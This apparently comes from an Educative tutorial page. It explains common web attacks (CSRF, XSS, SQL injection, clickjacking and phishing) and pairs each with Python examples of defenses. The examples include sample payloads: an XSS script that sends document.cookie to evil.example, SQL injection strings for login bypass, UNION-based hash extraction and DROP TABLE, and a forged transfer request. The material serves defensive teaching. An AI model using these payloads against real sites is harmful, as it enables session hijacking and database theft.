What are common web attacks and their defenses?

Users rely on the web for activities in which their private information must stay confidential: usernames, passwords, credit card details, and so on. However, every website on the internet is vulnerable to web-based attacks to some extent. Web attacks can steal information, manipulate the user, or inject a malicious payload, and they can target either the browser side or the server side.

The illustration below shows some of the most common web attacks:

Cross-Site Request Forgery (CSRF)

A CSRF attack takes advantage of the following factors to make the user's browser perform an action the user did not intend:

  • The attacker causes the user to visit an attacker-controlled page or link, which silently issues a request (for example, an auto-submitted form) to the target site.

  • The browser automatically attaches the user's session cookie to that request, so the target site treats it as coming from the already-authenticated user.

CSRF works against applications that rely purely on cookie-based session handling to identify the requester. The attacker does not need to read the cookie, and cannot set custom HTTP headers on a cross-site request; the attack only needs the browser to send a request that the server cannot distinguish from a legitimate one.

Defenses

A few defenses and preventive measures against CSRF attacks include the following:

  • Use CSRF tokens: an unpredictable, per-session value that the server embeds in its forms (or that the client sends in a custom HTTP header) and verifies on every state-changing request. A cross-site page can neither read the token nor set custom headers, so forged requests fail the check.

  • Set the SameSite attribute (Lax or Strict) on session cookies so the browser does not attach them to cross-site requests.

  • Use distinct URLs with randomized components for sensitive actions, so that the attacker cannot predict the request to forge.

  • Require re-authentication, or an explicit confirmation step, for sensitive actions such as password or e-mail changes.
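The following is an added example, not code from the original page, showing the synchronizer-token defense described above in a toy Python endpoint. The session store, the session id "sess-alice", the /transfer form and the request dicts are all constructed for the example; the cookie and form field names are assumptions. It contrasts a legitimate submission (token present) with a cross-site forged submission (cookie attached by the browser, token absent):

```python
import hmac
import secrets
from typing import Optional

# Constructed in-memory session store, standing in for the server's session
# backend. Each session gets its own unpredictable CSRF token
# (synchronizer token pattern).
SESSIONS = {
    "sess-alice": {"user": "alice", "balance": 500, "csrf": secrets.token_urlsafe(32)},
}


def login_cookie(session_id: str) -> str:
    """Set-Cookie value for the session. SameSite=Lax stops the browser from
    attaching the cookie to cross-site POSTs: an independent second layer."""
    return f"session={session_id}; Path=/; Secure; HttpOnly; SameSite=Lax"


def render_transfer_form(session_id: str) -> str:
    """Embed the session's token in the form the legitimate page serves. An
    attacker page on another origin cannot read this HTML, so it never learns
    the token."""
    token = SESSIONS[session_id]["csrf"]
    return (
        '<form method="POST" action="/transfer">'
        f'<input type="hidden" name="csrf_token" value="{token}">'
        '<input name="amount"><input name="to"><button>Send</button></form>'
    )


def verify_csrf(session_id: str, submitted: Optional[str]) -> bool:
    if not submitted:
        return False
    expected = SESSIONS[session_id]["csrf"]
    # Constant-time comparison so the check itself does not leak the token.
    return hmac.compare_digest(expected.encode(), submitted.encode())


def handle_transfer(request: dict) -> str:
    """Toy state-changing endpoint. `request` is a constructed dict with the
    fields a web framework would expose: cookies, headers and form data."""
    session_id = request.get("cookies", {}).get("session")
    if session_id not in SESSIONS:
        return "401 not logged in"
    # Accept the token as a hidden field or as a custom header; a cross-site
    # form post can supply neither.
    token = (request.get("form", {}).get("csrf_token")
             or request.get("headers", {}).get("X-CSRF-Token"))
    if not verify_csrf(session_id, token):
        return "403 CSRF token missing or invalid"
    SESSIONS[session_id]["balance"] -= int(request["form"]["amount"])
    return "200 transfer accepted"


def legitimate_request() -> dict:
    """What the browser sends after the user submits the real form."""
    return {
        "cookies": {"session": "sess-alice"},
        "form": {"csrf_token": SESSIONS["sess-alice"]["csrf"], "amount": "100", "to": "bob"},
    }


def forged_request() -> dict:
    """What the browser sends when an attacker page auto-submits a form to
    /transfer: the session cookie is attached automatically, but the attacker
    cannot supply the token."""
    return {
        "cookies": {"session": "sess-alice"},
        "form": {"amount": "400", "to": "attacker"},
    }


if __name__ == "__main__":
    print(handle_transfer(forged_request()))
    print(handle_transfer(legitimate_request()))
    print(SESSIONS["sess-alice"]["balance"])
```

The forged request is rejected with 403 and the balance is untouched, while the legitimate request succeeds. Note that the token check only protects endpoints that actually call it: every state-changing route must be covered, and GET requests should never change state.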

Cross-site Scripting (XSS)

In an XSS attack, the attacker targets the website's users rather than the website itself. The attacker injects a malicious script into a page that the application serves, and the victim's browser executes that script in the origin of the trusted site, giving it access to the victim's session, the page's DOM, and any data the page can reach. XSS falls into two main categories:

  • Reflected XSS: the malicious script is carried in a request (for example, in a URL parameter) and reflected by the web application into the response sent to the user's browser. The victim has to be lured into following the crafted link.

  • Stored XSS: the malicious script is stored by the website itself (in a comment, profile field, or message, for example) and served to every user who views the page. It is more damaging than reflected XSS because the victim only has to visit the page.

Defenses

The most common defenses against XSS attacks are as follows:

  • Validate input against an allow-list. Every value the application consumes, including cookies, headers, and hidden fields, should be checked against a list of allowed formats rather than a list of known-bad strings.

  • Render untrusted data safely by encoding it for the context in which it is placed (HTML body, HTML attribute, JavaScript string, URL), as described in the OWASP XSS Prevention Cheat Sheet. A Content Security Policy that disallows inline scripts limits the damage if an injection slips through.
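As an added example (not from the original page), the Python below shows both defenses just listed: an allow-list validator for a username, and context-specific output encoding applied to a stored comment. The comment markup, the `data-author` attribute and the `PAYLOAD` string are constructed for the example; the functions are illustrative, not any framework's API. It deliberately includes a JavaScript-string context, where HTML encoding alone is the wrong tool:

```python
import html
import json
import re

# Constructed stored-XSS payload, as an attacker might post in a comment.
PAYLOAD = "<script>fetch('https://evil.example/?c='+document.cookie)</script>"

USERNAME_RE = re.compile(r"[A-Za-z0-9_]{1,32}")


def validate_username(value: str) -> bool:
    """Allow-list validation: accept only what a username may look like,
    instead of trying to enumerate bad strings."""
    return USERNAME_RE.fullmatch(value) is not None


def encode_for_html(untrusted: str) -> str:
    """For text inside an element or inside a *quoted* attribute. Escapes
    & < > " ' so the value can close neither the element nor the attribute."""
    return html.escape(untrusted, quote=True)


def encode_for_js_string(untrusted: str) -> str:
    """For a value placed inside an inline <script> as a JS string literal.
    json.dumps yields a double-quoted literal with quotes, backslashes,
    control characters and (with the default ensure_ascii) all non-ASCII
    characters escaped. '</' is additionally escaped so the HTML parser can
    never see a closing </script> inside the literal."""
    return json.dumps(untrusted).replace("</", "<\\/")


def render_comment_vulnerable(author: str, body: str) -> str:
    # Raw interpolation: a stored payload executes in every viewer's browser.
    return f'<div class="comment" data-author="{author}"><p>{body}</p></div>'


def render_comment_safe(author: str, body: str) -> str:
    # Same markup, but each value is encoded for the context it lands in
    # (quoted attribute, element body).
    return (
        f'<div class="comment" data-author="{encode_for_html(author)}">'
        f"<p>{encode_for_html(body)}</p></div>"
    )


def render_greeting_script_safe(display_name: str) -> str:
    # Value embedded in a JS string literal inside an inline script.
    return f"<script>var who = {encode_for_js_string(display_name)};</script>"


if __name__ == "__main__":
    print(render_comment_vulnerable("mallory", PAYLOAD))
    print(render_comment_safe("mallory", PAYLOAD))
    print(render_greeting_script_safe("</script><script>alert(1)</script>"))
```

The encoded comment renders the payload as visible text, and the script-context encoder keeps a `</script>` inside the name from terminating the real script block. The general rule is that the encoder is chosen by where the value lands, not by where it came from.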

SQL Injection

In an SQL injection attack, the attacker supplies input that the application concatenates into an SQL query, so that the query's structure changes: the attacker can then read, change, delete, or update information in the database, or bypass checks such as a login's password comparison.

Defenses

The most common defense against SQL injection attacks is to use parameterized queries (prepared statements) in the code: the query structure is sent to the database independently of the user-supplied values, so the attacker's input is only ever treated as data, never as SQL. Input validation and a least-privilege database account add defense in depth but do not replace parameterization.
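The following added example (not from the original page) puts a string-built login query beside its parameterized form, using Python's built-in sqlite3 module against a constructed in-memory database with a single user. The two attacker inputs are constructed as well: one comments out the password check, the other appends a UNION to read the stored password hash through the same query.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory database with one user, standing in for the
    application's real database."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT)"
    )
    conn.execute("INSERT INTO users VALUES (1, 'alice', 'hash-of-alice-password')")
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password_hash: str):
    """String-built query: user input becomes part of the SQL syntax."""
    query = (
        "SELECT id FROM users WHERE username = '" + username + "' "
        "AND password_hash = '" + password_hash + "'"
    )
    return conn.execute(query).fetchone()


def login_safe(conn: sqlite3.Connection, username: str, password_hash: str):
    """Parameterized query: the structure is fixed before the values are
    bound, so a quote in the input is just a quote."""
    query = "SELECT id FROM users WHERE username = ? AND password_hash = ?"
    return conn.execute(query, (username, password_hash)).fetchone()


# Constructed attacker inputs.
# The closing quote ends the string literal and `--` comments out the rest of
# the WHERE clause, so the password is never checked.
BYPASS_USERNAME = "alice' --"
# The first SELECT matches nothing; the UNION returns data from a column the
# query was never meant to expose.
DUMP_USERNAME = "' UNION SELECT password_hash FROM users --"


if __name__ == "__main__":
    conn = make_db()
    print(login_vulnerable(conn, BYPASS_USERNAME, "wrong"))   # authentication bypassed
    print(login_safe(conn, BYPASS_USERNAME, "wrong"))         # None
    print(login_vulnerable(conn, DUMP_USERNAME, "x"))         # password hash leaked
    print(login_safe(conn, DUMP_USERNAME, "x"))               # None
```

With the vulnerable function the bypass input logs in as user 1 and the UNION input returns the password hash; the parameterized function returns no row for either, because the whole input is compared as a username. The sqlite3 module's `execute` also refuses to run more than one statement per call, which blocks stacked queries such as `'; DROP TABLE users; --`, but that is a property of this driver rather than a defense to rely on.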

Impersonation

Impersonation attacks mislead the user into believing that what they see is something other than what it really is. There are two common categories:

  • Clickjacking: misleading users about what they are clicking. The attacker loads the target page in an invisible frame over a decoy page, so a user who thinks they are clicking a harmless button or advertisement actually clicks a control on the hidden page.

  • Phishing: misleading users about whom they are interacting with, typically through a lookalike site or e-mail that harvests credentials.

Defenses

Some defenses against clickjacking and phishing attacks include:

  • Require confirmation from users for sensitive actions on the web, so that a single hijacked click cannot complete them.

  • Prevent the page from being framed at all. Historically this was done with frame-busting JavaScript, which attackers learned to bypass; the reliable approach is the X-Frame-Options: DENY (or SAMEORIGIN) response header, or a Content-Security-Policy with a frame-ancestors directive, both of which the browser enforces before any page script runs.

  • Delete suspicious e-mails and protect your personal information to prevent phishing attacks; on the site side, multi-factor authentication limits what a phished password is worth.
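The following is an added example, not code from the original page, for the anti-framing defense above. It shows a weak response (no anti-framing header) beside two hardened ones, and a small checker that decides whether a page with a given set of response headers may be framed by a given origin, following the browser rules: a CSP frame-ancestors directive takes precedence over X-Frame-Options, and absence of both means anyone can frame the page. The header sets, the origins bank.example, evil.example and partner.example are constructed; the matcher assumes default ports and handles only the scheme-host source forms.

```python
from urllib.parse import urlsplit

# Constructed response headers: the weak configuration beside two hardened ones.
WEAK_HEADERS = {"Content-Type": "text/html"}
HARDENED_HEADERS = {
    "Content-Type": "text/html",
    "X-Frame-Options": "DENY",
    "Content-Security-Policy": "frame-ancestors 'none'",
}
PARTNER_HEADERS = {
    "Content-Type": "text/html",
    "Content-Security-Policy": "default-src 'self'; frame-ancestors 'self' https://*.partner.example",
}


def _header(headers: dict, name: str) -> str:
    """Case-insensitive header lookup; empty string when absent."""
    for key, value in headers.items():
        if key.lower() == name.lower():
            return value
    return ""


def frame_ancestors_sources(csp: str):
    """Return the source list of the frame-ancestors directive, or None if
    the policy has no such directive."""
    for directive in csp.split(";"):
        parts = directive.strip().split()
        if parts and parts[0].lower() == "frame-ancestors":
            return [p.lower() for p in parts[1:]]
    return None


def source_matches(source: str, origin: str, self_origin: str) -> bool:
    """Match one frame-ancestors source expression against a framing origin.
    Assumption: default ports; only 'none', 'self', '*' and scheme/host
    sources (with an optional leading *.) are handled."""
    if source == "'none'":
        return False
    if source == "'self'":
        return origin == self_origin
    if source == "*":
        return True
    parsed = urlsplit(origin)
    if "://" in source:
        scheme, host = source.split("://", 1)
        if scheme != parsed.scheme:
            return False
    else:
        host = source  # scheme-less host source matches any scheme
    if host.startswith("*."):
        return parsed.hostname.endswith(host[1:])
    return parsed.hostname == host


def frameable_by(headers: dict, origin: str, self_origin: str) -> bool:
    """True if a page served with these headers may be framed by `origin`.
    Browsers that support frame-ancestors ignore X-Frame-Options when both
    are present, so CSP is consulted first."""
    sources = frame_ancestors_sources(_header(headers, "Content-Security-Policy"))
    if sources is not None:
        return any(source_matches(s, origin, self_origin) for s in sources)
    xfo = _header(headers, "X-Frame-Options").strip().upper()
    if xfo == "DENY":
        return False
    if xfo == "SAMEORIGIN":
        return origin == self_origin
    return True  # no anti-framing header: any site can overlay this page


if __name__ == "__main__":
    for name, hdrs in [("weak", WEAK_HEADERS), ("hardened", HARDENED_HEADERS), ("partner", PARTNER_HEADERS)]:
        print(name, frameable_by(hdrs, "https://evil.example", "https://bank.example"))
```

Run against a captured response, the checker reports that the weak configuration lets evil.example frame the page, the hardened one lets nobody frame it, and the partner policy admits only same-origin pages and https subdomains of partner.example. Sending both headers, as the hardened set does, covers older browsers that understand X-Frame-Options but not frame-ancestors.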

HowDev By Educative. Copyright ©2025 Educative, Inc. All rights reserved